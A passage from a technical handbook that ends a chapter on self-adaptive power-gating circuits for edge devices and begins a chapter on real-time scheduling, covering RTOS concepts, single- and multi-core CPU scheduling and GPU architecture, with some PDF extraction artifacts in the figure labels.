same activity pattern of TXN , node ST’s potential rises faster at higher temperatures.
Similarly, if the power-gated domain is explored to low threshold voltage, TXP in
the embedded learner circuit will also have a lower threshold voltage. Thus, with
varying process conditions, the charging rate from TXP tracks the process corner.
IDL
RD RCH
CN-1 CN CN+1
Learn Adapt
Learn Adapt CTRL
Tobs
CTRL
PGE Learner
IDL Overhead/process/
0 0
temperature regulated
P/T 1 PG signal
IDL
sensing
its overheads. In the figure, the periodic signal RD determines the characterization
cycle (CN ) of the learner. In this period, by comparing potential leakage savings
to power-gating overheads, the learner deduces if it is beneficial to perform power-
gating. At the beginning of CN , the node ST is charged to the reference voltage
(VREF ) through the transmission gate in the learner circuit and using the control
signal RCH. At the end of CN , the final ST voltage VST is compared to VREF using a
clocked comparator-controlled by the read signal RD. Based on such a comparison,
the learner generates the output signal CTRL. If CTRL = 0, i.e., VREF > VST ,
it indicates that the overheads are dominant since TXN is able to discharge CST
faster than TXP can charge it. Essentially, overheads in the power-gated domain are
dominant over the energy-savings under power-gating. In this case, the multiplexer
in Fig. 20 does not perform power-gating even if the unit is idle. On the other hand,
if CTRL = 1, it indicates that leakage savings are dominant over the overheads.
Therefore, power-gating is performed as usual depending on the idle signal. Since
learner circuit’s output intrinsically depends on PVT conditions as well as activity
patterns, power-gating is adaptive to such variations in the power-gated domain.
Agilent
Oscilloscope Virtex 5 FPGA
Blocked idle patterns due
Regulated PG SPI to excessive overheads
signals External Idle Output PG patterns
Inverter chain LVT RVT signals
with embedded
heaters Learning cycles
LVT RVT Internal Idle/RD/ Learn Adapt
SBA Learner RCH signal
Sig gen generator
Input idle patterns
Keithley Source-
meter
Supply voltage to heater and inverter chain, and measure power
(a) (b)
Fig. 21 (a) Test chip to characterize power-gating efficiency learner. (b) Self-adaptation under
varying idle signal patterns
3 High TOFF
u1.6 NPG
Low TOFF
2.5 PG
SAPG
2
BE point tracking
25W/cm2
1.5 Heater=25W/cm2
u
1
0.5 Heater=2.5W/cm2
0 2.5W/cm2
0 1 2 3 4 5 6
Dynamic noise Output PG patterns
TOFF (µs)
induced irregularities
(a) (b)
Fig. 22 (a) Leakage + overhead power at various power-gating scenarios (NPG no power-gating,
PG power-gating, SAPG self-adaptive power-gating). (b) Measured generation of idle signal-based
power-gating signal at varying idle signal activity and temperature
power-gating domain. The RVT and LVT power-gating domains essentially emulate
extreme within-chip process variations. A heater, designed with diffusion resistors,
is embedded in the design to emulate dynamic temperature variations. Heater power
is varied to control the on-chip temperature, essentially emulating the effect of hot
spots and local temperature variations.
A key metric for power-gating-induced energy benefit is break-even time. After
the onset of power-gating, at break-even point, leakage energy-saving equalizes to
power-gating overhead. If the continuous idle period is longer than the break-even
point, power-gating is rewarding. The learner circuit’s accuracy is characterized by
comparing the actual break-even point of a power-gated domain against the one
predicted by the learner. The actual breakeven is measured by directly power-gating
the domain with the periodic idle patterns (IDL) of fixed on time and varying off
time (TOFF ). At a lower TOFF , the average total (leakage + overhead) energy of
the domain increases. The corresponding results (label: PG) are shown in Fig. 22a.
The non-power-gated (label: NPG) case is the leakage power in the absence of
3 Architectures for Self-Powered Edge Intelligence 119
Output PG patterns RD
Learn Adapt
Learning cycle
(a) (b)
Fig. 23 (a) The effect of learning cycle on self-adaptive power-gating scheme. (b) Overall system
energy minimizes at an optimal learning period
120 A. R. Trivedi et al.
References
Agarwal K, Deogun H, Sylvester D, Nowka K (2006) Power gating with multiple sleep modes. In:
7th international symposium on quality electronic design (ISQED’06). IEEE, p 5
Akl CJ, Ayoubi RA, Bayoumi MA (2009) An effective staggered-phase damping technique for
suppressing power-gating resonance noise during mode transition. In: 2009 10th international
symposium on quality electronic design. IEEE, pp 116–119
Amazon Blink. https://www.amazon.com/stores/page/C5DECBBE-4F56-4C36-B933-E6214457
8691
Anandkumar A, Ge R, Hsu D, Kakade SM, Telgarsky M (2014) Tensor decompositions for learning
latent variable models. J Mach Learn Res 15(80):2773–2832. [Online]. Available: http://jmlr.
org/papers/v15/anandkumar14b.html
Arora S, Leighton T, Maggs B (1990) On-line algorithms for path selection in a nonblocking
network. In: Proceedings of ACM symposium on theory of computing (STOC), pp 149–158
Bank RE, Douglas CC (1993) Sparse matrix multiplication package (SMMP). Adv Comput Math
1:127–137
Benezeth Y, Jodoin P-M, Emile B, Laurent H, Rosenberger C (2010) Comparative study of
background subtraction algorithms. J Electron Imag 19(3):033003
Bennett J, Lanning S (2007) The Netflix prize. In: KDD cup and workshop in conjunction with
KDD
Boyapati R, Huang J, Wang N, Kim KH, Yum KH, Kim EJ (2017) Fly-over: a light-weight
distributed power-gating mechanism for energy-efficient networks-on-chip. In: 2017 IEEE
international parallel and distributed processing symposium (IPDPS). IEEE, pp 708–717
Brutzer S, Höferlin B, Heidemann G (2011) Evaluation of background subtraction techniques for
video surveillance. In: IEEE CVPR, pp 1937–1944. [Online]. Available: http://ieeexplore.ieee.
org/lpdocs/epic03/wrapper.htm?arnumber=5995508
Cevik I, Huang X, Yu H, Yan M, Ay S (2015) An ultra-low power CMOS image sensor with on-
chip energy harvesting and power management capability. Sensors 15(3):5531–5554. [Online].
Available: http://www.mdpi.com/1424-8220/15/3/5531/
Charania T, Opal A, Sachdev M (2012) Analysis and design of on-chip decoupling capacitors.
IEEE Trans Very Large Scale Integr (VLSI) syst 21(4):648–658
Chefi A, Soudani A, Sicard G (2013) A CMOS image sensor with low-complexity video
compression for wireless sensor networks. In: IEEE NEWCAS, pp 1–4. [Online]. Avail-
able: http://ieeexplore.ieee.org/xpls/abs_all.jsp?arnumber=6573591 http://ieeexplore.ieee.org/
lpdocs/epic03/wrapper.htm?arnumber=6573591
Chiou AY-C, Hsieh C-C (2015) A 0.4 V self-powered CMOS imager with 140 dB dynamic range
and energy harvesting C86 C87, pp 86–87
Dong L, Jin C, Closson AB, Trase I, Richards HR, Chen Z, Zhang JX (2020a) Cardiac energy
harvesting and sensing based on piezoelectric and triboelectric designs. Nano Energy 76:105076
Dong L, Closson AB, Jin C, Nie Y, Cabe A, Escobedo D, Huang S, Trase I, Xu Z, Chen Z et al
(2020b) Multifunctional pacemaker lead for cardiac energy harvesting and pressure sensing.
Adv Healthcare Mater 9(11):2000053
Dunne MC, Potts RB (1964) Algorithm for traffic control. Oper Res 12(6):870–881
Eisenstat SC, Elman HC, Schultz MH, Sherman AH (1984) The (new) Yale sparse matrix package.
In: Elliptic Problem Solvers, vol 2, pp 45–52
Elgammal A, Harwood D, Davis L (2000) Non-parametric model for background subtraction. In:
ECCV, vol 1843, pp 751–767
Fallah YP, Mansour H, Khan S (2008) A link adaptation scheme for efficient transmission. Circuits
Syst Video Technol IEEE 18(7):875–887
Gao W, Hsu D, Lee WS, Shen S, Subramanian K (2017) Intention-Net: integrating planning and
deep learning for goal-directed autonomous navigation, CoRR, vol. abs/1710.05627. [Online].
Available: http://arxiv.org/abs/1710.05627
Google Home. https://store.google.com/us/magazine/compare_nest_speakers_displays
122 A. R. Trivedi et al.
Singh M, Fayed AA (2020) A 1-a 6-mhz digitally assisted buck–boost converter with seamless
mode transitions and fast dynamic performance for mobile devices. IEEE Trans Power Electron
36(4):4338–4351
Trivedi AR, Mukhopadhyay S (2012) Self-adaptive power gating with test circuit for on-line
characterization of energy inflection activity. In: 2012 IEEE 30th VLSI test symposium (VTS).
IEEE, pp 38–43
Trivedi AR, Mukhopadhyay S (2014) Potential of ultralow-power cellular neural image processing
with Si/Ge tunnel FET. IEEE Trans Nanotechnol 13(4):627–629
Trivedi AR, Amir MF, Mukhopadhyay S (2014a) Ultra-low power electronics with si/ge tunnel
FET. In: 2014 design, automation & test in Europe conference & exhibition (DATE). IEEE,
pp 1–6
Trivedi AR, Yueh W, Mukhopadhyay S (2014b) In situ power gating efficiency learner for fine-
grained self-adaptive power gating. IEEE Trans Circuits Syst II: Express Briefs 61(5):344–348
Trivedi A, Pandey R, Liu H, Datta S, Mukhopadhyay S (2015) Gate/source overlapped hetero-
junction tunnel FET for non-boolean associative processing with plasticity. In: 2015 IEEE
international electron devices meeting (IEDM). IEEE, pp 17–8
Tsapatsoulis N, Loizou C, Pattichis C (2007) Region of interest video coding for low bit-rate
transmission of carotid ultrasound videos over 3G wireless networks. In: Annual international
conference of the IEEE engineering in medicine and biology, pp 3717–3720
Tuan M-C, Chen S-L (2015) Fully pipelined VLSI architecture of a real-time block-based object
detector for intelligent video surveillance systems. In: 2015 IEEE/ACIS 14th international
conference on computer and information science (ICIS), pp 149–154. [Online]. Available:
http://ieeexplore.ieee.org/lpdocs/epic03/wrapper.htm?arnumber=7166585
Uzun OA, Köse S (2014) Converter-gating: a power efficient and secure on-chip power delivery
system. IEEE J Emerg Sel Top Circuits Syst 4(2):169–179
Vasudevan A, Anderson A, Gregg D (2017) Parallel multi channel convolution using general matrix
multiplication. In: IEEE international conference on application-specific systems, architectures
and processors (ASAP), pp 19–24
Veličković P, Cucurull G, Casanova A, Romero A, Lio P, Bengio Y (2017) Graph attention
networks, arXiv preprint arXiv:1710.10903
Wang H-T, Leon-Salas WD (2015) An image sensor with joint sensing and energy harvesting
functions. IEEE Sens J 15(2):902–916. [Online]. Available: http://ieeexplore.ieee.org/lpdocs/
epic03/wrapper.htm?arnumber=6894563
Zhang S, Du Z, Zhang L, Lan H, Liu S, Li L, Guo Q, Chen T, Chen Y (2016) Cambricon-
x: an accelerator for sparse neural networks. In: 2016 49th annual IEEE/ACM international
symposium on microarchitecture (MICRO). IEEE, pp 1–12
Zhang Z, Wang H, Han S, Dally WJ (2020) SpArch: efficient architecture for sparse matrix
multiplication. In: IEEE international symposium on high performance computer architecture
(HPCA), pp 261–274
Zhou Z, Chen X, Li E, Zeng L, Luo K, Zhang J (2019) Edge intelligence: paving the last mile of
artificial intelligence with edge computing. Proc IEEE 107(8):1738–1762
Zohair M, Moyer K, Eaves-Rathert J, Meng C, Waugh J, Pint CL (2020) Continuous energy
harvesting and motion sensing from flexible electrochemical nanogenerators: toward smart and
multifunctional textiles. ACS Nano 14(2):2308–2315
Real-Time Scheduling for Computing
Architectures 4
Arvind Easwaran, Michael Yuhas, Saravanan Ramanathan,
and Ankita Samaddar
Contents
Real-Time Operating System (RTOS) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128
Introduction to Key OS Features . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128
Introduction to Real-Time Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 130
Real-Time CPU Scheduling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 132
Scheduling on Single-Core CPUs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 132
Scheduling on Multi-core CPUs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 134
Real-Time Scheduling for CPU-GPU Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 137
GPU Background . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 137
Scheduling Tasks on a Single GPU . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 140
Multi-GPU and CPU-GPU Scheduling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 143
Application Domains . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 146
Tools and Frameworks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 147
Alternative Architectures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 148
Real-Time Edge Computing Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 148
Introduction to Edge Computing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 148
The Edge Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 150
Real-Time Edge Computing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 151
Resource Allocation in Real-Time Edge . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 152
Introduction to Real-Time Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 156
Real-Time Wired Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 156
Real-Time Wireless Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 158
Real-Time Flow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 161
Routing and Scheduling in Real-Time Wireless Sensor Networks . . . . . . . . . . . . . . . . . . . . 163
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 164
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 165
Abstract
Keywords
An operating system (OS) is a software component, commonly also called the kernel
due its central role in modern computing systems. It serves two important functions:
(1) As a hardware abstractor, it facilitates and simplifies the interactions between
end-users (i.e. humans, other connected computing systems, etc.) and the hardware.
(2) As a resource manager, it is responsible for efficiently distributing the hardware
resources among the various software applications in the computing system so as
to achieve global system-wide objectives related to efficiency and performance.
These objectives could include throughput, energy consumption, responsiveness and
resource utilization, among others.
Computing systems have evolved significantly since their inception in the late
1800s. In the early phase, these systems were custom-built and highly optimized
to perform specific tasks (e.g. scientific computations, financial transactions, etc.).
Such batch systems essentially executed a specific software function repeatedly on
different data in a sequential manner. Their main memory (i.e. transient memory)
layout was rather simple; a region dedicated for the customized OS and the remain-
der for storing data and executing the specialized function. However, their overall
performance was rather limited, not only because of the lack of generalization, but
also due to the fact that tasks often need to use different hardware resources at
different times in their execution. So, when a task is performing some input/output
(I/O) operations, the central processing unit (CPU) or processor is idling unless
4 Real-Time Scheduling for Computing Architectures 129
the OS is able to run some other tasks on the CPU. To overcome this inefficiency,
the concept of multiprogramming was introduced in computing systems. In a multi-
programmed system, several tasks are waiting in main memory for access to various
hardware resources, and the OS efficiently switches between these tasks allocating
them resources depending on their needs. Although the OS functions are inherently
more complex in such systems when compared to batch systems, this flexibility and
dynamism leads to efficient utilization of the hardware resources.
One of the important functions of the OS is to schedule the ready tasks on the
CPU. In other words, this function aims to determine which among the tasks that are
in the main memory and ready to execute should be selected next for execution on
the CPU. The selection strategy is of course influenced by the functional objective
which could either be task-specific such as minimization of average completion time
or system-wide such as throughput maximization. There are several CPU scheduling
strategies including first-come-first-served (FCFS) in which tasks are prioritized
based on their arrival time in the system, shortest job first (SJF) in which tasks
are prioritized based on their CPU execution time and quantum-based round robin
(RR) in which tasks are executed in a round robin fashion with a fixed quantum of
allocated execution time. Among these scheduling strategies, RR and its variants are
popular in the OS industry, mainly due to their ability to increase the responsiveness
of the system; a task is guaranteed to get access to the CPU after waiting for a finite
duration of time.
In a multi-programmed system, when the OS switches a task out of the CPU
before it completes, it may be in the middle of executing a critical transaction
comprising several instructions. For example, this transaction could be modifying
a variable that is shared among several tasks or simply accessing some data that
requires exclusive access. This context switch by the OS may lead to an erroneous
scenario if the task that is switched into the CPU also accesses the same shared
variable or data. The final outcome of executing these instructions from the two tasks
may then depend on the specific location of the context switch, and this problem is
called a race condition; the two tasks are racing against each other to modify the
shared variable or data. Synchronization is a function that aims to synchronize the
execution of several tasks to ensure that such race conditions do not occur. Of course
this requires the task developer to annotate and identify instructions that have the
potential to cause race conditions. Synchronization can be achieved either through
specialized hardware instructions (e.g. TestAndSet instruction that allows tasks to
atomically test and set the value of a lock variable) or through OS functions such as
semaphores. A semaphore is a special integer variable that can only be modified by
the OS, and it can be used to lock a set of task instructions so that race conditions
can be prevented.
Main memory management is an important function of the OS in a multi-
programmed system, because of the need to efficiently distribute this resource
among the various tasks that are ready to execute. Paging is a popular dynamic
partitioning scheme in which the entire memory region is pre-partitioned into fixed-
size pages, and the OS allocates pages to tasks on demand. Thus, the number of
pages allocated to a task can vary over time, enabling a very dynamic allocation
130 A. Easwaran et al.
scheme that adapts to task demand at runtime. Paging also enables the concept of
virtual memory since all the pages of a task need not be allocated in main memory at
all times. Pages are brought into main memory from secondary storage on demand,
which means that the memory address space accessible to a task can be much larger
than the available main memory.
It is impossible to provide an in-depth coverage of the various OS functions
and their interactions with hardware as well as application software in such a brief
introductory note. Interested readers should refer to well-known OS textbooks (Sil-
berschatz et al. 2018; Tanenbaum and Bos 2022).
Cyber-physical systems (CPS) are computing systems in which the cyber world of
computation and communication is closely linked with the physical world of sensors
and actuators. Such systems provide monitoring, coordination and control services
for the physical counterparts and find application across a variety of domains such as
avionics, automotive, medical devices, robotics, smart manufacturing, smart grids,
etc. Within CPS, there exists a class of systems in which the timeliness of decisions
is as important as its correctness. These are typically closed-loop control systems
and deployed in safety-critical settings with stringent requirements. Examples of
such systems include airbag control in automotive, flight control in avionics and
robotic control systems, among several others. This class of systems is broadly
referred to as real-time systems, in which the timeliness requirements are usually
specified using hard deadlines for the real-time tasks.
As a representative example, consider the collision avoidance system in modern
automotive. There are one or more sensors, such as a camera or a radar, which are
observing the environment while the vehicle is in motion. The control system has to
process these sensor inputs, determine the potential for a collision with an obstacle
in the path and take appropriate preventive actions such as application of emergency
brakes and/or steering the vehicle towards safety. The amount of time available to
the system to perform these steps is strictly limited by the speed at which the vehicle
is travelling and the stopping capabilities of the braking system. In other words, the
control task responsible for collision avoidance must produce an output within a pre-
determined amount of time from the instance at which sensor data is available. This
duration of time is the hard deadline imposed on the task due to system requirements
and constraints.
To enable the deployment of real-time systems, the OS used must be capable of
meeting the strict timing requirements. Essentially, the OS must allocate hardware
resources to the real-time tasks in such a way that it ensures the satisfaction of
hard deadlines under all considered circumstances. That is, predictability of meeting
the timing requirements even in worst-case scenarios is the primary objective of
the OS in such systems. This is in contrast to general-purpose OS discussed in
section “Introduction to Key OS Features”, in which the objectives are typically
average-case performance metrics such as throughput maximization or completion
time minimization. It is important to note that minimizing the average completion
4 Real-Time Scheduling for Computing Architectures 131
time of tasks does not necessarily imply that the hard deadlines of tasks will be
met. In order to meet such stringent timing requirements, the OS essentially has to
prioritize access of the hardware resources among the tasks based on their deadlines.
Furthermore, in such systems, it is also important to ensure that the time taken by
various OS functions is bounded and predictable under all considered circumstances
(e.g. time taken for OS functions, time to switch the CPU from one task to another,
etc.). Given these specific requirements, an OS deployed in the context of a real-time
system is called a real-time operating systems or RTOS in short form.
To meet the hard deadlines of real-time tasks, an RTOS must be aware of certain
critical task parameters such as deadline, worst-case amount of execution time that
the task will consume, worst-case amount of main memory required, the frequency
with which tasks will be released in the system, etc. Without this information a
priori, the RTOS will be unable to prioritize access to the hardware resources so
as to ensure that task deadlines are always met. Task specifications in the real-time
systems’ literature can be broadly classified into two categories: (1) periodic real-
time tasks in which the tasks are released into the system using a time-triggered
mechanism, so that their frequency of arrival in the system can be modelled
exactly using the notion of a time period (e.g. collision avoidance control system
in automotive), and (2) sporadic real-time tasks in which the tasks are released into
the system using an event-triggered mechanism, so that their frequency of arrival in
the system cannot be modelled exactly (e.g. anti-lock braking system in automotive
that is activated whenever the brakes are applied). To facilitate predictability, a
sporadic task is additionally specified with a minimum inter-arrival time indicating
the minimum separation between successive arrivals of the task. Each new arrival of
a task is denoted as a task instance in this chapter. Example periodic and sporadic
real-time tasks are illustrated in Fig. 1.
In an RTOS, although deadline-based prioritization of all the hardware resources
is important, processor scheduling in particular is of prime concern and hence the
focus of a substantial body of literature. This is due to the central role of the
processor in ensuring that the instructions of a real-time task are executed within
Fig. 1 Illustrating periodic and sporadic real-time tasks. The blue arrows indicate arrival times
and the red arrows indicate absolute deadlines for task instances. The figure shows tasks with a
period or minimum inter-arrival time value of 10 units and relative deadline of 7 units. (a) Periodic
real-time task. (b) Sporadic real-time task
132 A. Easwaran et al.
This section focuses on literature related to CPU scheduling problems in the context
of real-time systems. It first introduces key scheduling algorithms and corresponding
results for single-core CPUs, followed by the same for multi-core CPUs.
1. Under fixed-priority scheduling, each instance of a real-time task has the same
relative priority (higher or lower) when compared to any instance of another
task. In other words, priorities are fixed at the task level and do not change
from one instance of the task to another. The first algorithm introduced is called
the rate monotonic (RM) scheduler that prioritizes real-time tasks based on
the value of their period or minimum inter-arrival time; the smaller the period
or minimum inter-arrival time, the higher is the priority of the task (Liu and
4 Real-Time Scheduling for Computing Architectures 133
task instance and (2) interference from higher-priority task instances called waiting
time. Joseph and Pandya observed that, for fixed-priority schedulers on single-core
CPUs and a given real-time task, it is feasible to determine a fixed taskset release
pattern that maximizes the interference from higher-priority task instances. Based
on this observation, they developed an iterative closed-form equation to derive the
worst-case response time for tasks. The schedulability test then involves checking
that the worst-case response time of every task is no more than its deadline. This test
is exact, in that it is both necessary and sufficient to ensure that all task deadlines
are met. However, the runtime complexity of the test is pseudo-polynomial in the
size of the input specification, because it can be proportional to the task deadline
parameter. Alternatively, a polynomial-time sufficient schedulability test for RM
scheduler based on the condition that the total utilization (Utilization of any real-
time task is the ratio of its worst-case execution time to its period or minimum
inter-arrival time.) of the taskset is no more than a specific threshold value has
been proposed (Liu and Layland 1973). Finally, it has also been shown that DM
is an optimal fixed-priority scheduler, in the sense that if a taskset is schedulable
under any fixed-priority algorithm, then it is also schedulable under DM (Leung
and Whitehead 1982).
Liu and Layland (1973) (likewise Dertouzos 1974) have shown that EDF
scheduler is optimal for scheduling periodic (likewise sporadic) real-time tasks on
single-core CPUs, in the sense that if a real-time taskset is schedulable then it is
also schedulable under EDF. Thus, a simple polynomial-time schedulability test for
EDF is to check whether the total utilization of the taskset is no more than 1. It is
easy to see that any taskset whose total utilization exceeds 1 cannot be successfully
scheduled on a single-core CPU, i.e. not all task deadlines can be met. However, this
simple test is only applicable for tasksets in which each task’s relative deadline is
equal to its period or minimum inter-arrival time. For scenarios when this is not the
case, a demand bound function -based schedulability test for EDF schedulers has
been proposed (Baruah et al. 1990a,b). The demand bound function for a real-time
task is the maximum total demand that all the instances of that task would generate
in a given duration of time. The resulting test is exact; however, it has an exponential
runtime complexity in the general case.
Core 1 t1 t3
Core 2 t2
0 e 1
Fig. 2 Illustration of Dhall effect on multi-core CPU. The figure shows two cores and three tasks;
τ1 and τ2 with utilization and τ3 with utilization greater than 1 − . Due to the restriction that τ3
cannot be scheduled in parallel on both the cores, it will miss its deadline
1. Under partitioned scheduling, real-time tasks are offline partitioned and mapped
to individual processing cores, and single-core algorithms, such as those dis-
cussed in section “Scheduling on Single-Core CPUs”, are used to schedule
them independently on each core. This significantly simplifies the scheduling
problem because all the results from single-core scheduling can now be applied
to this case. However, the task to core mapping problem is a fundamentally hard
problem, equivalent to the NP-complete multiple knapsack problem (Zhang and
Geng 1998). Additionally, from a theoretical perspective, partitioned scheduling
has a performance threshold at 50% (Oh and Bakker 1998). That is, there exist
tasksets with a total utilization approximately m/2 which cannot be scheduled
on a m-core CPU by any partitioned scheduling algorithm. A simple example of
such a taskset is shown in Fig. 3; each task has a utilization slightly more than 0.5.
136 A. Easwaran et al.
Core 1 t1
Core 2 t2 tm+1
Core m tm
0 50 100
Utilization
Fig. 3 Illustration of the theoretical limit of partitioned scheduling algorithms. The figure shows
a m-core CPU and a collection of m + 1 real-time tasks. Each task τi has a utilization slightly more
than 0.5. As can be seen, the taskset cannot be successfully partitioned on the m-core CPU
2. Under global scheduling, a single scheduling algorithm manages the entire multi-
core CPU, and a task instance can be scheduled to run on any of the idle cores.
It is also possible that a task instance has to migrate from one core to another
while in the midst of its execution. This flexibility significantly enhances the
capabilities of such schedulers, and in particular, they do not have a performance
threshold like in the case of partitioned schedulers. However, this flexibility
comes at a cost. Task migrations are in general an expensive operation in that
they can significantly increase the worst-case execution time of task instances.
This is because of task data in the private core-specific caches that are no longer
accessible when a task instance migrates to another core. This data now has to
be fetched again from lower-level shared caches or in some cases even the main
memory, thus increasing the execution time of task instances.
Algorithms from section “Scheduling on Single-Core CPUs” such as RM, DM, EDF
and LLF can also be used to schedule multi-core CPUs, both under partitioned
and global scheduling paradigms. Under the partitioned strategy, instances of the
algorithm will execute on each core and independently schedule the mapped tasks.
Under the global strategy, a single instance of the algorithm will execute on one of
the cores and simultaneously schedule tasks on all the cores. For example, under
RM global scheduling, at any time instant, m active task instances having the
lowest period values will be scheduled to run on a m-core CPU. Although all these
algorithms have been extensively studied in the literature (Davis and Burns 2011),
in general, their performance in terms of their ability to meet all task deadlines is
largely limited. This is especially so when their performance is compared to the
single-core CPU case.
4 Real-Time Scheduling for Computing Architectures 137
While CPU systems are based on the single instruction single data paradigm (or
multiple instruction multiple data in the case of multi-core CPU systems) where one
execution unit operates on one piece of data at a time using a single instruction, such
a paradigm is not necessarily efficient at tackling embarrassingly parallel problems
such as those found in graphics processing applications. Embarrassingly parallel
problems are a class of computational problems that are easy to solve using a set of
parallel operations with little or no data dependency between the parallel computa-
tions. Graphics processing units (GPUs) allow the parallelization of computations
via the single instruction multiple thread (SIMT) parallel processing model (Vuduc
and Choi 2013). Under SIMT, the same operation is performed on data stored in
different locations of memory in parallel; each thread executes the same instruction,
but operates on different data. SIMT enables highly parallel computation without the
memory, space and power overhead of supporting completely independent compute
units like traditional multi-core CPU systems. Over time, GPUs have evolved to
support general purpose computational tasks as well. Such devices are referred to
as general purpose graphics processing units (GPGPUs), and they have been used
as accelerators for tasks such as computer vision, machine learning and database
query processing. Such tasks often appear in applications with real-time constraints;
however, GPUs’ SIMT architecture introduces some unique challenges to providing
real-time guarantees.
GPU Background
Early GPUs were designed specifically for graphics processing tasks and did not
support general purpose computation. Through the use of shaders, small programs
138 A. Easwaran et al.
that are run on dedicated graphics hardware, early GPUs could calculate the values
for individual pixels on a display. Early shaders were inflexible and did not even
support looping operations; GPUs processed shaders in a fixed pipeline starting with
3D operations like vertex and geometry shaders, and ending with pixel shaders to set
the individual pixel values in the output frame buffer. Over time, however, shaders
gained more functionality and GPU execution units became capable of running more
general programs. Today, these small programs that run in parallel on a GPU are
referred to as kernels to distinguish them from shaders, which are solely designed
for graphical calculations.
Fig. 4 A prototypical GPU architecture. The names of the components and layout will vary
depending on the manufacturer. Some GPUs may contain additional cores dedicated to certain
operations and different caching and memory access schemes
4 Real-Time Scheduling for Computing Architectures 139
compute units (CUs) or Intel’s slices. SMs are capable of running instructions and
processing data independently of each other and have access to a large bank of
shared memory where the instructions and data for processing are stored. Any new
data coming from the host or data generated by the execution of a GPU kernel must
be deposited in this shared memory before it can be accessed by the host system
or SMs. Each SM contains its own pool of instruction memory and data memory,
which acts as a cache for the slower shared memory. Different manufacturers may
implement different caching schemes with additional levels of caches. Each SM
contains multiple EUs (referred to as CUDA cores on NVIDIA GPUs and stream
processors on AMD GPUs) which form the backbone of the SIMT architecture.
Each EU in an SM executes the same instruction simultaneously, but operates
on different addresses in data memory. This means, for instance, if a branch is
encountered in a set of instructions, the instructions for both branch conditions must
be executed on all EUs in sequence, with only the relevant EUs updating values in
memory for the currently executing branch. This also implies that during looping
operations, individual EUs are not freed if the loop terminates early for the data
they are processing; all EUs finish processing the set of instructions simultaneously.
While all the EUs in an SM must execute the same thread, multiple sets of threads
can be allocated to an SM and a warp scheduler is used to determine which set of
threads should be executing at any given time.
Some GPUs are integrated in the same package as a CPU to form a heterogeneous
system on a chip (SoC). Internally, these integrated GPUs (iGPUs) function similar
to discrete GPUs, but externally they have direct access to the same memory
as their host CPU. Figure 5 illustrates a prototypical example of the memory
sharing arrangement for an iGPU (Intel 2021), although the design details will vary
depending on the manufacturer. In this case both the GPU and CPU share access
to a last level cache (LLC), so there is no need to copy data and instructions before
launching kernels on the GPU. The LLC is kept coherent with main memory by a
memory controller. While this shared memory makes launching kernels on the GPU
faster, the extra layers of caching can make accurately predicting response times of
individual tasks a challenge.
Threading Model
From the application perspective, tasks are composed of kernels to be executed on
the GPU as well as the number of thread blocks and threads per block that need to
be executed. The execution time of a task is the time the GPU spends executing its
kernel’s instructions. The response time of the task is the total time spent from the
host dispatching a task instance to the GPU until the time the result is received by
the host. This includes the communication bus delay and the time the kernel spends
blocked by other task instances waiting to execute on the GPU.
When launching a kernel as a task instance, the number of threads as well as
the number of thread blocks to execute must be specified. Each thread executes the
same instructions, but operates on different data. For instance when performing an
operation between two vectors, the index of each element can be mapped to a thread.
When performing a vector addition, the same instruction (addition) is performed
140 A. Easwaran et al.
Fig. 5 A prototypical integrated GPU architecture; the GPU and CPU share access to the same
pool of memory
between the corresponding indices of both vectors. However, the number of threads
being executed simultaneously is limited by the resources on an SM. If a kernel is
launched with more threads than available resources, groups of threads of a fixed
size are executed in series until all the threads in a thread block have completed.
These groups of threads are called warps (also referred to as wavefronts in AMD
GPUs and subgroups in OpenCL). Synchronization between warps is required as
there is no guarantee of the order in which they will be scheduled on a given SM.
A set of threads forms a thread block. While threads within a block can
share memory, thread blocks cannot share memory among themselves. Most
GPU architectures have a limit on the maximum number of threads that can be
allocated to one block (e.g. 1024 threads per block in CUDA), which requires
tasks operating on large data to split operations between multiple thread blocks in
